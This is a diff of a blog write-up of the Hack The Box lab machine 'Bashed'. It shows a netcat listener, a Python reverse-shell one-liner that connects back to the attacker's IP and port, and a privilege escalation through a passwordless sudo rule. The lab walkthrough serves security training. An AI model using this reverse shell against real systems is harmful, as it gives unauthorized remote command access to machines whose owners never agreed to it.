rax-register/rax-register.github.io/_posts/2020-07-09-htb-bashed.md

 ![](/images/bashed/11. pentestmonkey.png "pentestmonkey")

-This python reverse shell is also a favorite, so on our Kali machine, let's set up a nc listener to catch the connection:
+While there are many reverse shells on the pentestmonkey site, the python reverse shell shown above is normally a solid one to use against a linux machine.
+On our Kali machine, let's set up a nc listener to catch the connection:

     nc -lvnp 17011

 ![](/images/bashed/12. nc_listener.png "nc listener")

+Before sending the python one-liner, you must add your IP address and listener port in the "s.connect(( ))" portion of the code.

 Then in the phpbash window:

     python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.24",17011));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

 A note here: Bashed is an older machine so it is fine to default to using "python" which is normally symlinked to python2.
-In newer machines you will want to specify "python3" instead as python2 is deprecated.
+In newer machines (Ubuntu 20.04 on onward) you will want to specify "python3" instead as python2 may not be supported.

 ![](/images/bashed/13. nc_connection.png "nc connection")

 We have a shell!
 Let's check if we can sudo anything:

+    sudo -l

 ![](/images/bashed/14. sudo-l.png "sudo -l")

 And we can!
-We can run any command as the user scriptmanager without a password.
-A dangerous misconfiguration for sure.
+We can run any command as the user scriptmanager without a password which is a dangerous misconfiguration.
 Since user scriptmanager probably has more permissions than user www-data, let's log ourselves in as scriptmanager:

     sudo -u scriptmanager bash -i